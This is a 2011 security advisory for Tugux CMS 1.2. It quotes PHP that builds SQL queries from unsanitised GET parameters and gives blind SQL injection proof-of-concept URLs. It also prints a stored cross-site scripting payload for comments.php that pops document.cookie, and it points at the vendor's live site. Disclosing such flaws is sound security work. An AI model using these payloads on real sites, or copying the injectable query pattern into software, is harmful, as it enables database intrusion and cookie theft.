Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26643
HistoryJul 13, 2011 - 12:00 a.m.

Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)

2011-07-1300:00:00
vulners.com
28

===================================================================
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info

References:
http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple-vulnerability.html

===================================================================
Vuln c0de on page_text.php

<?php

session_start();
require_once "scripts/connect_to_mysql.php";

if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
$date = $row["lastmodified"];
}
mysqli_free_result($query);

//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$admin = $row["admin"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$body = $row["pagebody"];
}
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
$nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'")
or die (mysqli_error($myConnection));

===================================================================

exploit &amp; p0c

[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]

Example p0c

[!] http://server/page_text.php?nid=12 <= True
[!] http://server/page_text.php?nid=-12 <= False

[!] http://server/page_text.php?pid=51 <= True
[!] http://server/page_text.php?pid=-51 <= False

[+] http://server:3306 <= download the file , save and open with c++ or wordpad will show
mysql version

[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D

===================================================================

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: xss
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info

====================================================================

comments.php file is persistant to xss attack

Go to

http://server/comments.php

and put or type this xss c0de into the command box

';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//–></SCRIPT>">'><SCRIPT>alert(StringfromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script>

then the site will direct you to

http://server/latest.php?nid=

and there you go… xss will pop up

p0c:
http://server/comments.php
or
http://server/path/comments.php

official site: http://www.tugux.com/comments.php

Gratz:

  • YOGYACARDERLINK , DEVILZC0DE , etc
  • Nofia Fitri (unyuІ), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw),
    wenkhairu, etc (capek aja di ketik semua)

====================================================================

Nothing Impossible In This World Even Nobody&#96;s Perfect

                    Hacking is Art

===================================================================

==========================| -=[ E0F ]=- |==========================